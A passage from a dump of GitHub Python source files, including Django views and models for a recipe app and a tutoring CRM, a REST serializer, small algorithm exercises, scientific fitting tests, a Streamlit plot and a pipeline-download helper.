\n\n\n","repo_name":"DFRobot/DFRobot_ICG20660L","sub_path":"python/raspberrypi/DFRobot_ICG20660L.py","file_name":"DFRobot_ICG20660L.py","file_ext":"py","file_size_in_byte":64968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"28117784112","text":"from django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.http import Http404, HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.template import loader\nfrom django.urls import reverse_lazy\nfrom django.db import models\nfrom django.core.paginator import Paginator\nfrom django.core.exceptions import PermissionDenied\n\nfrom .models import Ingredient, Dish, Recipe, Fridge, recipe_finder, recipe_finder_session, Unit, get_dish_energy\nfrom .forms import NewIngredient, NewDish, DishForm, AddIngredient, EditIngredient\n\n\ndef index(request):\n \"\"\"\n Creation view for home page.\n :param request: Django request\n :return: Django HttpResponse.\n \"\"\"\n\n edit = request.GET.get('edit_mode')\n\n current_user = request.user\n if current_user.is_authenticated:\n # get ingredients from users fridge for creating view\n fridge_ing = Fridge.objects.filter(user_id = current_user.id, is_available = True).select_related('ingredient')\n\n if request.method == 'POST':\n # check for POST called from deletion. Post send ingredient_id in name\n is_deleted = False\n for temp in fridge_ing:\n if str(temp.ingredient_id) in request.POST:\n temp.is_available = False\n temp.save()\n form = AddIngredient()\n is_deleted = True\n break\n\n # else check for submitting new ingredient for fridge\n if not is_deleted:\n form = AddIngredient(request.POST)\n if form.is_valid():\n ing_id = form.cleaned_data['ingredient'].id\n try:\n k = Fridge.objects.get(user_id = current_user.id, ingredient_id = ing_id)\n k.is_available = True\n k.save()\n except Fridge.DoesNotExist:\n k = Fridge(user_id = current_user.id, ingredient_id = ing_id)\n k.save()\n\n # calls one more time for updating ingredient list\n fridge_ing = Fridge.objects.filter(user_id=current_user.id, is_available=True).select_related('ingredient')\n else:\n form = AddIngredient()\n\n available_dish_id = recipe_finder(current_user)\n dish_list = [Dish.objects.get(id=i['id']) for i in available_dish_id]\n context = {\n 'user': current_user,\n 'ing_list': fridge_ing,\n 'dish_list': dish_list,\n 'form': form,\n }\n else: #for anonymous user (Logic same as above)\n ing_re = request.session.setdefault('ing_re', [])\n ing_list = [Ingredient.objects.get(id=i) for i in request.session['ing_re']]\n if request.method == 'POST':\n is_deleted = False\n for temp in request.session['ing_re']:\n if str(temp) in request.POST:\n s = request.session['ing_re']\n s.remove(temp)\n print(\"Lefted\", s)\n request.session['ing_re'] = s\n form = AddIngredient()\n is_deleted = True\n break\n\n if not is_deleted:\n form = AddIngredient(request.POST)\n if form.is_valid():\n ing_id = form.cleaned_data['ingredient'].id\n request.session['ing_re'] = ing_re + [ing_id,]\n\n ing_list = [Ingredient.objects.get(id=i) for i in request.session['ing_re']]\n else:\n form = AddIngredient()\n\n dish_ids = recipe_finder_session(request.session)\n dish_list = [Dish.objects.get(id=i['id']) for i in dish_ids]\n context = {\n 'user': request.session,\n 'ing_list': ing_list,\n 'dish_list': dish_list,\n 'form': form,\n }\n\n template = loader.get_template('home.html')\n if edit:\n print('Get')\n template = loader.get_template('base.html')\n\n return HttpResponse(template.render(context, request))\n\n\ndef ing(request, ingredient_id):\n \"\"\"\n View for single ingredient.\n :param request: Django request\n :param ingredient_id: pk of ingredient\n :return: Django HttpResponse\n \"\"\"\n try:\n ingredient = Ingredient.objects.get(pk=ingredient_id)\n except Ingredient.DoesNotExist:\n raise Http404(\"There is no such ingredient.\")\n\n edit = request.GET.get('edit_mode')\n\n context = {\n 'ing': ingredient,\n }\n\n if edit:\n template = loader.get_template('models/ingredient_edit.html')\n data = {'name': ingredient.name, 'description': ingredient.description, 'energy': ingredient.energy,\n 'proteins': ingredient.proteins, 'fats': ingredient.fats, 'carbohydrate': ingredient.carbohydrate,}\n form = EditIngredient(data)\n if request.method == 'POST':\n form = EditIngredient(request.POST)\n if form.is_valid():\n ingredient.name = form.cleaned_data['name']\n ingredient.description = form.cleaned_data['description']\n ingredient.energy = form.cleaned_data['energy']\n ingredient.proteins = form.cleaned_data['proteins']\n ingredient.fats = form.cleaned_data['fats']\n ingredient.carbohydrate = form.cleaned_data['carbohydrate']\n ingredient.save()\n print('Updated.')\n return HttpResponseRedirect('../{}'.format(ingredient.id))\n context['form'] = form\n else:\n template = loader.get_template('models/ingredient.html')\n\n return HttpResponse(template.render(context, request))\n\n\ndef recipe(request, dish_id):\n \"\"\"\n View for single dish. Use forms for configuring ingredients.\n :param request: Django request\n :param dish_id: pk of dish\n :return: Django HttpResponse\n \"\"\"\n try:\n rec = Dish.objects.get(pk=dish_id)\n except Dish.DoesNotExist:\n raise Http404(\"There is no such recipe.\")\n\n edit = request.GET.get('edit_mode')\n\n # ingredients list for dish, use Recipe model\n ing_list = Recipe.objects.filter(dish_id=dish_id).select_related('ingredient')\n\n # Formating description. \\n -> list_item\n html_disctiption = '
  • ' + rec.description.replace('\\n', '
  • ') + '
'\n context = {\n 'dish_name': rec.name,\n 'ingredients_list': ing_list,\n 'dish_description': html_disctiption,\n 'energy': get_dish_energy(ing_list),\n }\n\n if edit:\n template = loader.get_template('models/dish_edit.html')\n data = {'name': rec.name, 'description': rec.description}\n form = NewDish(data)\n if request.method == 'POST':\n form = NewDish(request.POST)\n form_ing = DishForm(request.POST)\n\n for temp in ing_list:\n if 'Delete ' + str(temp.ingredient_id) in request.POST:\n Recipe.objects.filter(pk=temp.pk).delete()\n form = DishForm()\n break\n\n if form.is_valid():\n rec.name = form.cleaned_data['name']\n rec.description = form.cleaned_data['description']\n rec.save()\n print('Updated.')\n return HttpResponseRedirect('../{}'.format(rec.id))\n\n if form_ing.is_valid():\n ing2rec = Recipe(dish_id=dish_id, ingredient_id=form_ing.cleaned_data['ingredient'].id,\n amount=form_ing.cleaned_data['amount'], units=form_ing.cleaned_data['units'])\n ing2rec.save()\n else:\n form_ing = DishForm()\n\n context['form'] = form\n context['form_ing'] = form_ing\n ing_list = Recipe.objects.filter(dish_id=dish_id).select_related('ingredient')\n context['ingredients_list'] = ing_list\n else:\n template = loader.get_template('models/dish.html')\n\n return HttpResponse(template.render(context, request))\n\n\ndef catalog_ingredient(request):\n \"\"\"\n View for ingredient catalog\n :param request: Django request\n :return: HttpResponse\n \"\"\"\n ing_list = Ingredient.objects.all().order_by('id')\n\n # Django paginator (Maybe use direct request to DB?)\n paginator = Paginator(ing_list, 20)\n page = request.GET.get('page')\n product = paginator.get_page(page)\n\n #edit mode\n edit = request.GET.get('edit_mode')\n\n if edit and request.method == 'POST':\n for temp in product:\n if ('Delete ' + str(temp.id)) in request.POST:\n ingredient = Ingredient.objects.get(pk=temp.pk)\n try:\n ingredient.delete()\n break\n except models.ProtectedError:\n # error page\n return ingredient_error(request, ing)\n\n elif ('Edit ' + str(temp.id)) in request.POST:\n ingredient = Ingredient.objects.get(pk=temp.pk)\n return HttpResponseRedirect('{}?edit_mode=True'.format(ingredient.id))\n\n ing_list = Ingredient.objects.all().order_by('id')\n paginator = Paginator(ing_list, 20)\n page = request.GET.get('page')\n product = paginator.get_page(page)\n\n template = loader.get_template('models/ingredient_catalog.html')\n context = {\n 'product': product,\n 'edit': edit,\n }\n return HttpResponse(template.render(context, request))\n\ndef create_ingredient(request):\n \"\"\"\n View for creation ingredients\n :param request: Django request\n :return: HttpResponse\n \"\"\"\n if not request.user.is_staff:\n raise PermissionDenied\n if request.method == 'POST':\n form = NewIngredient(request.POST)\n if form.is_valid():\n ing = Ingredient(name=form.cleaned_data['name'], description=form.cleaned_data['description'],\n energy = form.cleaned_data['energy'], proteins = form.cleaned_data['proteins'],\n fats = form.cleaned_data['fats'], carbohydrate = form.cleaned_data['carbohydrate'])\n ing.save()\n return HttpResponseRedirect('{}'.format(ing.id))\n else:\n form=NewIngredient()\n\n template = loader.get_template('models/create_ingredient.html')\n context = {\n 'form': form,\n }\n return HttpResponse(template.render(context, request))\n\ndef catalog_recipe(request):\n \"\"\"\n View for dish catalog\n :param request: Django request\n :return: HttpResponse\n \"\"\"\n dish_list = Dish.objects.all().order_by('id')\n\n paginator = Paginator(dish_list, 20)\n page = request.GET.get('page')\n menu = paginator.get_page(page)\n\n # edit mode\n edit = request.GET.get('edit_mode')\n\n if edit and request.method == 'POST':\n for temp in dish_list:\n if ('Delete ' + str(temp.id)) in request.POST:\n Dish.objects.filter(pk=temp.pk).delete()\n break\n elif ('Edit ' + str(temp.id)) in request.POST:\n dish = Dish.objects.get(pk=temp.pk)\n return HttpResponseRedirect('{}?edit_mode=True'.format(dish.id))\n\n dish_list = Dish.objects.all().order_by('id')\n paginator = Paginator(dish_list, 20)\n page = request.GET.get('page')\n menu = paginator.get_page(page)\n\n template = loader.get_template('models/catalog.html')\n context = {\n 'menu': menu,\n 'edit': edit,\n }\n return HttpResponse(template.render(context, request))\n\ndef create_dish(request):\n \"\"\"\n View page for Dish creation. Ingredients can be added right now.\n :param request: Django request\n :return: HttpResponse\n \"\"\"\n if not request.user.is_staff:\n raise PermissionDenied\n\n i_list = request.session.setdefault('i_list', [])\n ingredients_list = [(Ingredient.objects.get(id=i[0]), i[1], Unit.objects.get(id=i[2])) for i in request.session['i_list']]\n\n if request.method == 'POST':\n form = NewDish(request.POST)\n form_ing = DishForm(request.POST)\n\n not_deleted = True\n for temp in request.session['i_list']:\n if 'Delete ' + str(temp[0]) in request.POST:\n s = request.session['i_list']\n s.remove(temp)\n print(\"Lefted\", s)\n request.session['i_list'] = s\n form_ing = DishForm()\n not_deleted = False\n break\n\n if not_deleted and form_ing.is_valid():\n ing_param = (form_ing.cleaned_data['ingredient'].id, float(form_ing.cleaned_data['amount']),\n form_ing.cleaned_data['units'].id)\n i_list = request.session['i_list']\n request.session['i_list'] = i_list + [ing_param,]\n elif not_deleted and form.is_valid():\n d = Dish(name=form.cleaned_data['name'], description=form.cleaned_data['description'])\n d.save()\n for ing in ingredients_list:\n ing2rec = Recipe(dish_id=d.id, ingredient_id=ing[0].id, amount=ing[1], units_id=ing[2].id)\n request.session['i_list'] = []\n ing2rec.save()\n\n return HttpResponseRedirect('{}'.format(d.id))\n\n ingredients_list = [(Ingredient.objects.get(id=i[0]), i[1], Unit.objects.get(id=i[2])) for i in request.session['i_list']]\n else:\n form = NewDish()\n form_ing = DishForm()\n\n template = loader.get_template('models/create_dish.html')\n context = {\n 'form': form,\n 'form_ing': form_ing,\n 'ingredients_list': ingredients_list,\n }\n return HttpResponse(template.render(context, request))\n\ndef ingredient_error(request, ing):\n \"\"\"\n Error page if somebody want to delete ingredient in use.\n :param request: Django request\n :param ing: ingredient what was deleted\n :return: HttpResponse\n \"\"\"\n ingredient_name = ing.name\n recipes_list = Recipe.objects.filter(ingredient=ing.id)\n template = loader.get_template('models/delete_error.html')\n context = {\n \"ingredient_name\": ingredient_name,\n \"recipes_list\": recipes_list,\n\n }\n return HttpResponse(template.render(context,request))\n\ndef help_page(request):\n \"\"\"\n Help page with information\n :param request: Django request\n :return: HttpResponse\n \"\"\"\n template = loader.get_template('help.html')\n context = {}\n return HttpResponse(template.render(context,request))\n","repo_name":"Ollleksa/RecipeHelper","sub_path":"Picker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11186544735","text":"from rest_framework import serializers\nfrom ..models.banners import Banner\nfrom ..constants import constants\nfrom rest_framework import exceptions\n\n\nclass AddBannerSerializer(serializers.ModelSerializer):\n picture_url = serializers.FileField(write_only=True, required=False, allow_null=True)\n\n def validate(self, data):\n media_file_obj = data.get('picture_url')\n if media_file_obj:\n media_file_size = data.get('picture_url').size\n\n if media_file_size > constants.MEDIA_FILE_SIZE_IMAGE:\n raise exceptions.ValidationError(\"The maximum file size that can be uploaded is 10 MB\")\n else:\n return data\n else:\n return data\n\n class Meta:\n model = Banner\n fields = ['title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n extra_kwargs = {'title': {'required': True}, 'device_type': {'required': True},\n 'sequence_number': {'required': True}, 'start_date': {'required': True}, 'end_date': {'required': True},\n 'picture_url': {'required': True}\n }\n\n\nclass GetAllBannersSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id', 'title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n\n\nclass GetBannerByIdSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id', 'title', 'device_type', 'picture_url', 'sequence_number', 'start_date', 'end_date', 'page_link']\n\n\nclass RemoveBannerByIdSerializer(serializers.ModelSerializer):\n class Meta:\n model = Banner\n fields = ['id']\n","repo_name":"avinas-dwivedi/detoxa-backend","sub_path":"detoxa_services/serializers/banners_serializer.py","file_name":"banners_serializer.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26794379343","text":"def word(s):\n lower = 0\n upper = 0\n for i in s:\n if(i.islower()):\n lower+=1\n else:\n upper+=1\n if(upper>lower):\n return s.upper()\n else:\n return s.lower()\n\ns = input()\nprint(word(s))","repo_name":"MrChepe09/Competitive-Programming-Codes","sub_path":"A2OJ/Ladder 0-1300/word.py","file_name":"word.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"83"} +{"seq_id":"28528302233","text":"def create_dictionary_from_lists(keys: list, values: list, *args, del_none=True, **kwargs):\n \"\"\"\n\n :param keys: list, tuple\n :param values: list, tuple\n :return:\n \"\"\"\n print(kwargs)\n if kwargs.get('upper'):\n keys = list(map(str.upper, keys))\n all_prices = dict(zip(keys, values))\n if del_none:\n all_prices = list(filter(lambda x: x[1] != None, all_prices.items()))\n if kwargs.get('sort_by_price'):\n all_prices.sort(key=lambda x: x[1])\n else:\n all_prices.sort()\n return dict(all_prices)\n\n\ndef print_dict(d: dict):\n for key, value in d.items():\n print(f'Key: {key}, value: {value}')\n\n\nkeys = ['Tv', 'laptop', 'Fan', 'fridge']\nvalues = [20000, 30000, None, 30000]\n\nnew_dict = create_dictionary_from_lists(keys, values, del_none=True, upper=True, sort_by_price=True)\nprint_dict(new_dict)\n\nnames = ['Basil', 'Ivan', 'Katya', 'Sveta']\nsurname = ['Ivanov', 'Petrov', 'Sinichkina', 'Petrova']\n\nfio_dict = create_dictionary_from_lists(names, values=surname)\nprint_dict(fio_dict)\n\nshort_names = list(map(lambda x: f'{x[0][0]}. {x[1]}', fio_dict.items()))\nprint(short_names)","repo_name":"ilia-brykin/gb","sub_path":"python/teacher/lesson3_functions_dictionaries/funcions_test.py","file_name":"funcions_test.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15702231524","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.timezone import now\nfrom django.contrib.postgres.fields import ArrayField\n\nimport random\nimport string\n\nclass Manager(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n phone = models.CharField(max_length=100, default=\"\")\n bank_details = models.TextField(default=\"\")\n #branch\n # status - archive or not\n\n class Meta:\n verbose_name_plural = 'managers'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name,self.user.last_name)\n\n\nclass StudentStatus(models.Model):\n title = models.CharField(max_length=30, default=\"Лид\")\n\n class Meta:\n verbose_name_plural = 'student_statuses'\n\n def __str__(self):\n return self.title\n\n#class Promotion\n#trigger promotion using get params from ads\n\n\n\n#class OFD\n\n\nclass Student(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n address = models.CharField(max_length=100)\n amount = models.IntegerField(default=0)\n currency = models.CharField(max_length=4)\n status = models.ForeignKey(StudentStatus, on_delete=models.CASCADE)\n phone = models.CharField(max_length=100, default=\"\")\n bonus = models.PositiveIntegerField(default=0)\n #comment = models.CharField(max_length=500)\n #time_added\n #branches\n #subjects\n #responsible_manager\n #status - archive or not\n #source\n #script of dialog with clients\n #причина отказа\n #promotion = ForeignKey\n\n class Meta:\n verbose_name_plural = 'students'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name, self.user.last_name)\n\n\nclass Teacher(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n birthday = models.DateField(null=True, blank=True)\n address = models.CharField(max_length=100)\n salary = models.IntegerField(default=0)\n hourly_rate = models.IntegerField(default=250)\n currency = models.CharField(max_length=4)\n phone = models.CharField(max_length=100, default=\"\")\n #branch\n #responsible_manager\n #subjects m2m\n #time_added\n #status - archive or not\n #date_added = models.DateTimeField(default=now,blank=True)\n\n class Meta:\n verbose_name_plural = 'teachers'\n\n def __str__(self):\n return \"{0} {1}\".format(self.user.first_name, self.user.last_name)\n\n\nclass Branch(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'branches'\n\n def __str__(self):\n return self.title\n\n\nclass Subject(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n price = models.IntegerField(default=1000)\n # quality_test_for_teacher\n\n class Meta:\n verbose_name_plural = 'subjects'\n\n def __str__(self):\n return self.title\n\n\nclass Module(models.Model):\n title = models.CharField(max_length=30, blank=True, null=True)\n module_number = models.IntegerField(default=0)\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE)\n student_text = models.TextField(blank=True, null=True)\n teacher_text = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name_plural = 'modules'\n\n def __str__(self):\n return \"{0} ({1})\".format(self.title, self.subject)\n\n\ndef meeting_link():\n letters = string.ascii_lowercase\n meeting_str = ''.join(random.choice(letters) for i in range(10))\n return meeting_str\n\n\nclass Lesson(models.Model):\n name = models.CharField(max_length=100)\n branch = models.ForeignKey(Branch, default=0, on_delete=models.CASCADE)\n students = models.ManyToManyField(Student, blank=True)\n subject = models.ForeignKey(Subject, on_delete=models.CASCADE)\n teacher = models.ManyToManyField(Teacher)\n module = models.ForeignKey(Module, on_delete=models.CASCADE)\n start = models.DateTimeField(default=now,blank=True)\n end = models.DateTimeField(default=now,blank=True)\n duration = models.PositiveIntegerField(default=60)\n homework = models.TextField(blank=True)\n link = models.CharField(max_length=400, default=meeting_link, blank=True)\n finished = models.BooleanField(default=False)\n\n\n class Meta:\n verbose_name_plural = 'lessons'\n\n def __str__(self):\n return self.name + \" \" + str(self.start)\n\n\nclass LessonInfo(models.Model):\n lesson = models.ForeignKey(Lesson, on_delete=models.CASCADE)\n students_visited = models.ManyToManyField(Student)\n user_changed = models.ForeignKey(User, on_delete=models.CASCADE)\n date_changed = models.DateTimeField(default=now,blank=True)\n\n def __str__(self):\n return \"History: \" + str(self.lesson.name)\n\n\nclass Task(models.Model):\n\n HIGH = \"ВЫСОКИЙ\"\n MIDDLE = \"СРЕДНИЙ\"\n LOW = \"НИЗКИЙ\"\n Priority = (\n (HIGH, \"Высокий\"),\n (MIDDLE, \"Средний\"),\n (LOW, \"Низкий\"),\n )\n\n NEW = \"NEW\"\n IN_WORK = \"IN_WORK\"\n FINISHED = \"FINISHED\"\n Status = (\n (NEW, \"New\"),\n (IN_WORK, \"In_work\"),\n (FINISHED, \"Finished\"),\n )\n\n title = models.CharField(max_length=200)\n students = models.ManyToManyField(Student, blank=True)\n description = models.TextField(blank=True)\n executor = models.ManyToManyField(Manager, blank=True)\n priority = models.CharField(max_length=9,\n choices=Priority,\n default=HIGH)\n date_added = models.DateTimeField(default=now,blank=True)\n date_finish = models.DateTimeField(default=now,blank=True)\n status = models.CharField(max_length=9,\n choices=Status,\n default=NEW)\n comment = models.TextField(blank=True)\n\n\n class Meta:\n verbose_name_plural = 'tasks'\n\n def __str__(self):\n return self.title\n\n\nclass KPI(models.Model):\n\n name = models.CharField(max_length=200)\n result = ArrayField(models.IntegerField())\n plan = ArrayField(models.IntegerField())\n year = models.IntegerField(default=2021)\n comment = models.TextField(blank=True)\n\n class Meta:\n verbose_name_plural = 'kpi'\n\n def __str__(self):\n return self.name\n\n\nclass Finance(models.Model):\n\n INCOME = \"Доход\"\n EXPENSE = \"Расход\"\n PaymentType = (\n (INCOME, \"Доход\"),\n (EXPENSE, \"Расход\")\n )\n\n BANK = \"Банковский счет\"\n CARD = \"Перевод на карту\"\n ACQUIRING = \"Эквайринг\"\n TERMINAL = \"Терминал\"\n PFDO = \"Сертификат ПФДО\"\n PaymentAccount = (\n (BANK, \"Банковский счет\"),\n (CARD, \"Перевод на карту\"),\n (ACQUIRING, \"Эквайринг\"),\n (TERMINAL, \"Терминал\"),\n (PFDO, \"Сертификат ПФДО\"),\n )\n\n COURSES = \"Курсы\"\n CAMP = \"Лагерь\"\n RENT = \"Аренда\"\n SALARY = \"Зарплата\"\n ExpenseItem = (\n (COURSES, \"Курсы\"),\n (CAMP, \"Лагерь\"),\n (RENT, \"Аренда\"),\n (SALARY, \"Зарплата\"),\n )\n\n title = models.CharField(max_length=200)\n orderId = models.CharField(max_length=200, blank=True)\n payment_type = models.CharField(max_length=50, choices=PaymentType, default=INCOME)\n payment_account = models.CharField(max_length=50, choices=PaymentAccount, default=ACQUIRING)\n expense_item = models.CharField(max_length=50, choices=ExpenseItem, default=COURSES)\n amount = models.PositiveIntegerField(default=0)\n currency = models.CharField(max_length=4, blank=True)\n payment_date = models.DateTimeField(default=now, blank=True)\n date_added = models.DateTimeField(default=now,blank=True)\n user_added = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)\n comment = models.TextField(blank=True)\n\n class Meta:\n verbose_name_plural = 'Finances'\n\n def __str__(self):\n return self.title\n\n\n#class Branch\n\n\n\n\n\n\n\n","repo_name":"dobriy-zhuk/guarantee_learning","sub_path":"box/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14787580572","text":"\"\"\"\nGiven a 1-indexed array of integers numbers that is already sorted in non-decreasing order, find two numbers such that they add up to a specific target number. Let these two numbers be numbers[index1] and numbers[index2] where 1 <= index1 < index2 <= numbers.length.\n\nReturn the indices of the two numbers, index1 and index2, added by one as an integer array [index1, index2] of length 2.\n\nThe tests are generated such that there is exactly one solution. You may not use the same element twice.\n\nYour solution must use only constant extra space.\n\"\"\"\n\n\ndef two_sum_ii(numbers, target):\n left, right = 0, len(numbers) - 1\n\n while numbers[left] + numbers[right] != target:\n # case 1: sum is too big\n if numbers[left] + numbers[right] > target:\n right -= 1\n # case 2: sum is too small\n elif numbers[left] + numbers[right] < target:\n left += 1\n else:\n break\n\n # indices are 1-indexed for some reason\n return [left + 1, right + 1]\n\n\n\"\"\"\nidea:\n\n- consider the outer most numbers and move inwards\n- because the list is sorted:\n - if the pair of numbers is too big, the right number can never be used as a sum to get target\n - if the pair of numbers is too small, the left number can never be used as a sum to get target\n- with this logic, we can use 2 pointers to close the window to find the sum\n\ntime complexity:\n\n- every number is considered once so the time complexity is O(n)\n - having this sorted doesn't actually impact the time complexity at all\n\nspace complexity:\n\n- everything is done in place so the space complexity is O(1)\n - this does improve the space complexity by not having to need a hash map\n\"\"\"\n","repo_name":"MstrZhang/leetcode","sub_path":"arrays/2sum_ii.py","file_name":"2sum_ii.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6784790225","text":"import numpy as np\nimport pandas as pd\nfrom cell_tracker.analysis import fit_arc_ellipse\nfrom cell_tracker import data\n\ndef get_mock_ellipsis_segment(radius=30, dtheta=4*np.pi/3,\n ellipticity=1.5,\n noise=1e-4, n_points=10,\n t_step=3, rotation=None):\n\n a = 2 * radius /(1 + ellipticity)\n b = 2 * radius /(1 + 1/ellipticity)\n t_stamps = np.arange(n_points)\n ts = t_stamps * t_step\n omega = dtheta / ts.max()\n phi_y, x0, y0 = 0, 0, 0\n xs = a * np.cos(omega * ts)\n ys = b * np.sin(omega * ts)\n zs = np.zeros(xs.size)\n x_err = np.random.normal(scale=noise*radius, size=xs.size)\n y_err = np.random.normal(scale=noise*radius, size=xs.size)\n z_err = np.random.normal(scale=noise*radius, size=xs.size)\n\n xs += x_err\n ys += y_err\n zs += z_err\n segment = pd.DataFrame(index=pd.Index(t_stamps, name='t_stamp'),\n data=np.vstack([xs, ys, zs, x_err, y_err, ts]).T,\n columns=['x', 'y', 'z', 'x_err', 'y_err', 't'])\n return segment\n\n\ndef test_simple_ellipis_fit_polar():\n\n segment = get_mock_ellipsis_segment()\n start = segment.index[0]\n stop = segment.index[-1]\n fit_data, components, rotated = fit_arc_ellipse(segment,\n start, stop,\n ['x', 'y', 'z'],\n method='polar',\n return_rotated=True)\n\n assert fit_data is not None\n chi2 = np.exp(-fit_data['gof'])\n np.testing.assert_almost_equal(chi2, 0, decimal=3)\n\ndef test_simple_ellipis_fit_cartes():\n\n segment = get_mock_ellipsis_segment()\n start = segment.index[0]\n stop = segment.index[-1]\n fit_data, components, rotated = fit_arc_ellipse(segment,\n start, stop,\n ['x', 'y', 'z'],\n method='cartesian',\n return_rotated=True)\n\n assert fit_data is not None\n chi2 = np.exp(-fit_data['gof'])\n np.testing.assert_almost_equal(chi2, 0, decimal=3)\n","repo_name":"glyg/cell-tracker","sub_path":"cell_tracker/tests/test_analysis.py","file_name":"test_analysis.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"8843675708","text":"def setify(a):\n result = []\n\n for item in a:\n if item not in result:\n result.append(item)\n\n return result\n\n\ndef diff(a, b):\n result = []\n\n for item in a:\n if item not in b:\n result.append(item)\n\n return setify(result)\n\n\ndef union(a, b):\n return setify(a + b)\n\n\ndef intersection(a, b):\n result = []\n\n for item in a:\n if item in b:\n result.append(item)\n\n return setify(result)\n\n\ndef cartesian_product(a, b):\n # Tuple is (a, b) as a syntax\n result = []\n\n for x in a:\n for y in b:\n result.append((x, y))\n\n return setify(result)\n\n\ndef main():\n print(setify([0, 1, 1, 5, 5, 6, 0, 1]) == [0, 1, 5, 6])\n print(union([0, 0, 0, 0, 0], [1, 2]) == [0, 1, 2])\n print(intersection([0, 0, 1, 2, 5], [5, 5, 6]) == [5])\n print(diff([0, 1, 2, 3, 4, 5], [0, 0, 1, 1, 2, 2, 3, 3]) == [4, 5])\n print(cartesian_product([0, 1, 1], [1, 0]))\n print(cartesian_product([0, 1], [1]) == [(0, 1), (1, 1)])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HackBulgaria/Programming0-1","sub_path":"week8/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"83"} +{"seq_id":"22621863782","text":"import streamlit as st\nimport plotly.express as px\nimport sqlite3\n\nst.title(\"Temperature of the World!\")\nresponse=sqlite3.connect(\"datb.db\")\ncursor = response.cursor()\ncursor.execute(\"SELECT * FROM temps\")\ncol1 = cursor.fetchall()\n\ndte=[]\ntmp=[]\nfor i in col1:\n dte.append(i[0])\n tmp.append(i[1])\n\nfigure= px.line(x=dte, y=tmp, labels={'x':'Date', 'y':'temperature in Celsius'})\nst.plotly_chart(figure)","repo_name":"RC2110/Web-Scraper","sub_path":"plotwebscrape.py","file_name":"plotwebscrape.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7129849888","text":"import base64\nimport importlib\nimport io\nimport os\nimport sys\nfrom zipfile import ZipFile\n\nimport requests\n\nfrom .pipeline import Pipeline\n\n\ndef import_pipeline(pipeline_dir_path: str):\n pipeline_dir = os.path.abspath(pipeline_dir_path)\n sys.path.append(pipeline_dir)\n pipeline_package = importlib.import_module(\"pipeline\")\n\n pipeline = next(v for _, v in pipeline_package.__dict__.items() if v and type(v) == Pipeline)\n return pipeline\n\n\ndef download_pipeline(url: str, token: str, run_id: str, target_dir):\n r = requests.post(\n url + \"/graphql/\",\n headers={\"Authorization\": f\"Bearer {token}\"},\n json={\n \"query\": \"\"\"\n query PipelineDownload($id: UUID!) {\n pipelineRun(id: $id) {\n id\n version {\n number\n }\n code\n }\n }\n \"\"\",\n \"variables\": {\"id\": run_id},\n },\n timeout=30,\n )\n r.raise_for_status()\n data = r.json()\n zipfile = base64.b64decode(data[\"data\"][\"pipelineRun\"][\"code\"].encode(\"ascii\"))\n source_dir = os.getcwd()\n os.chdir(target_dir)\n with ZipFile(io.BytesIO(zipfile)) as zf:\n zf.extractall()\n os.chdir(source_dir)\n","repo_name":"BLSQ/openhexa-sdk-python","sub_path":"openhexa/sdk/pipelines/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"14793000760","text":"\"\"\"Test SurveyLink entities and their interaction with cloud storage.\"\"\"\n\nimport cloudstorage as gcs\nimport logging\nimport random\nimport string\n\nfrom unit_test_helper import ConsistencyTestCase\nfrom model import SurveyLink\n\n\ndef generate_csv_content(num_links):\n \"\"\"Mock the contents of a Qualtrics unique link csv file.\n\n Args:\n num_links: int how many rows other than the header to generate\n\n Returns:\n a tuple with\n * the file contents as a string\n * a list of the unique link urls, in the same order as the csv rows\n \"\"\"\n csv_rows = [\n '\"Response ID\",\"Last Name\",\"First Name\",\"External Data Reference\",\"Email\",\"Status\",\"End Date\",\"Link\",\"Link Expiration\"'\n ]\n # Based on unique link csv export as of 2017-02-21.\n link_row_template = (\n 